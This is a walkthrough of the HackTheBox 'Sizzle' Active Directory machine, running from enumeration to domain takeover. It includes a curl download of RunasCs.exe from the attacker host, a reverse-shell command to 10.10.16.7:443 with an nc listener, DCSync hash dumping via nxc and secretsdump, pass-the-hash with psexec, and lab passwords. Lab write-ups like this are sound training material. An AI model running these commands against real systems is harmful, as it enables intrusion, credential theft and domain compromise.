Sizzle is an insane difficulty Windows box with an Active Directory environment. A writable directory in an SMB share allows to steal NTLM hashes which can be cracked to access the Certificate Services Portal. A self signed certificate can be created using the CA and used for PSRemoting. A SPN associated with a user allows a kerberoast attack on the box. The user is found to have Replication rights which can be abused to get Administrator hashes via DCSync.
Enumeration
Scope
IP Address: 10.10.10.103
Nmap Scan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack
53/tcp open domain syn-ack
80/tcp open http syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
443/tcp open https syn-ack
445/tcp open microsoft-ds syn-ack
3269/tcp open globalcatLDAPssl syn-ack
5986/tcp open wsmans syn-ack
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ sudo nmap -sU -p1-10000 --min-rate 10000 $ip -Pn
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
389/udp open ldap
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel2]
└─$ nmap -p21,53,80,135,139,443,445,3269,5986 -sCV $ip -Pn -oN Nmap/script-scan
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
53/tcp open domain?
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Microsoft IIS httpd 10.0
| tls-alpn:
| h2
|_ http/1.1
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
|_ssl-date: 2024-07-27T20:49:20+00:00; +6s from scanner time.
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
445/tcp open microsoft-ds?
3269/tcp open ssl/ldap
|_ssl-date: 2024-07-27T20:49:20+00:00; +6s from scanner time.
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2024-07-27T01:09:23
|_Not valid after: 2025-07-27T01:09:23
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_ssl-date: 2024-07-27T20:49:20+00:00; +6s from scanner time.
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2024-07-27T01:09:23
|_Not valid after: 2025-07-27T01:09:23
| tls-alpn:
| h2
|_ http/1.1
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-07-27T20:48:39
|_ start_date: 2024-07-26T17:19:10
|_clock-skew: mean: 5s, deviation: 0s, median: 5s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
* Open ports: 21,53,80,135,139,443,445,3269,5986
* UDP open ports: 53,88,389
* Services: FTP - DNS - HTTP - HTTTPS - RPC - SMB - winRM - LDAP - KERBEROS
* Important notes: Anonymous FTP login allowed - commonName=sizzle.htb.local
Update hosts file with domain name, FQDN and computer name
ldapsearch -H ldap://$ip -x -b "DC=htb,DC=local" sub '*' -D username -W password
<snip>
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A4C, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v3839
ZZ_ARCHIVE has several files & Users has users' folders
┌──(kali㉿kali)-[~/…/machines/Sizzle/share]
└─$ ls ZZ_ARCHIVE
AddComplete.pptx LimitInstall.doc 'anony-(externalcell).xlsx' test.doc
AddMerge.ram LimitStep.ppt 'anony-(frameset).docx' test.gif
<snip>
┌──(kali㉿kali)-[~/…/machines/Sizzle/share]
└─$ ls Users
Public amanda amanda_adm bill bob chris henry joe jose lkys37en morgan mrb3n
I will try to write a file on each directory and see if I have write access to one of them.
Although the credentials are valid, I can't access the machine with winRM
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ crackmapexec winrm $ip -u amanda -p 'Ashare1972'
HTTP 10.10.10.103 5986 SIZZLE [*] https://10.10.10.103:5986/wsman
WINRM 10.10.10.103 5986 SIZZLE [-] HTB.LOCAL\amanda:Ashare1972 "The server did not response with one of the following authentication methods Negotiate, Kerberos, NTLM - actual: ''"
I will continue to enumerate the machine with this credentials including
When viewing the share content, I find interesting files
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ smbclient -U amanda "\\\\$ip\CertEnroll"
smb: \> ls
. D 0 Sat Jul 27 13:19:47 2024
.. D 0 Sat Jul 27 13:19:47 2024
HTB-SIZZLE-CA+.crl A 721 Sat Jul 27 13:19:47 2024
HTB-SIZZLE-CA.crl A 909 Fri Jul 26 13:19:32 2024
nsrev_HTB-SIZZLE-CA.asp A 322 Mon Jul 2 16:36:05 2018
sizzle.HTB.LOCAL_HTB-SIZZLE-CA.crt A 871 Mon Jul 2 16:36:03 2018
Download them all
smb: \> mget *
Get file HTB-SIZZLE-CA+.crl? y
Get file HTB-SIZZLE-CA.crl? y
Get file nsrev_HTB-SIZZLE-CA.asp? y
Get file sizzle.HTB.LOCAL_HTB-SIZZLE-CA.crt? y
I will make Enumerate share access done in my notes and switch to collect data with bloodhound.py for further enumeration and go to /certsrv page
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle/test]
└─$ bloodhound-python -u 'amanda' -p 'Ashare1972' -ns 10.10.10.103 -d htb.local -c all --zip
INFO: Found AD domain: htb.local
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (sizzle.HTB.LOCAL:88)] [Errno 110] Connection timed out
INFO: Connecting to LDAP server: sizzle.HTB.LOCAL
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: sizzle.HTB.LOCAL
INFO: Found 8 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: sizzle.HTB.LOCAL
INFO: Done in 00M 20S
INFO: Compressing output into 20240727180002_bloodhound.zip
I Uploaded the zip file to bloodhound and go to /certsrv
After Authenticated to webapp, It leads me to this page.
I will click on Request a Certificate
Click on advanced certificate request
It asks for Certificate signing request .csr which can be signed with a private key, and I don't have one, So I will generate my private key and sign a .csr file with it.
To login to the machine, I need to have certificate signed from Certificate Authority (CA) of the domain along with the private key with which the certificate singing request was signed.
Also, after I Queried AppLocker policy, I found that I can run programs in tmp folder
Evil-WinRM* PS C:\Users\amanda> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollection
<snip>
PathConditions : {%OSDRIVE%\tmp\*}
PathExceptions : {}
PublisherExceptions : {}
HashExceptions : {}
Id : d754b869-d2cc-46af-9c94-6b6e8c10d095
Name : All files located in the Program Files folder
Description : Allows members of the Everyone group to run applications that are located in the Program Files folder.
UserOrGroupSid : S-1-1-0
Action : Allow
<snip>
I will then upload RunasCs.exe to the machine to get a shell as mrkly
*Evil-WinRM* PS C:\Windows\Temp> curl 10.10.16.7/RunasCs.exe -o .\RunasCs.exe
*Evil-WinRM* PS C:\Windows\Temp> .\RunasCs.exe mrlky 'Footxxxxxx' PowerShell -r 10.10.16.7:443
Enter PEM pass phrase:
[*] Warning: The logon for user 'mrlky' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-2e2163$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 2888 created in background.
Receive the connection with nc.
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.103] 55772
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami
htb\mrlky
Get user flag
PS C:\Users\mrlky> type Desktop\user.txt
b31ca0c7a5bcc77a55xxxxxxxxxxxxxx
User Flag: b31ca0c7a5bcc77a55xxxxxxxxxxxxxx
Shell as Administrator
From bloodhound, User Mlky has DCync rights, I can take over the domain by dumping ntds database.
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ nxc smb $ip -u mrlky -p 'Footbxxxxx' --ntds --user administrator
SMB 10.10.10.103 445 SIZZLE [+] HTB.LOCAL\mrlky:Football#7
SMB 10.10.10.103 445 SIZZLE Node MRLKY@HTB.LOCAL successfully set as owned in BloodHound
SMB 10.10.10.103 445 SIZZLE [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
SMB 10.10.10.103 445 SIZZLE [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.10.10.103 445 SIZZLE Administrator:500:aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792xxxxxxxxxxx:::
OR with secretsdump.py
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ impacket-secretsdump htb.local/mrlky@$ip -just-dc-user administrator
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792xxxxxxxxxxx:::
Access the machine with psexec.py
┌──(kali㉿kali)-[~/…/HTB/machines/Sizzle]
└─$ impacket-psexec htb.local/administrator@$ip -hashes :f6b7160bfc91823792xxxxxxxxxxxxx
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Requesting shares on 10.10.10.103.....
[*] Found writable share ADMIN$
[*] Uploading file APWgGeJS.exe
[*] Opening SVCManager on 10.10.10.103.....
[*] Creating service Kabl on 10.10.10.103.....
[*] Starting service Kabl.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
Get administrator flag
C:\Windows\system32> cd C:\Users\Administrator\Desktop
C:\Users\administrator\Desktop> type root.txt
c3d8011c9688feccaxxxxxxxxxxxxxxx
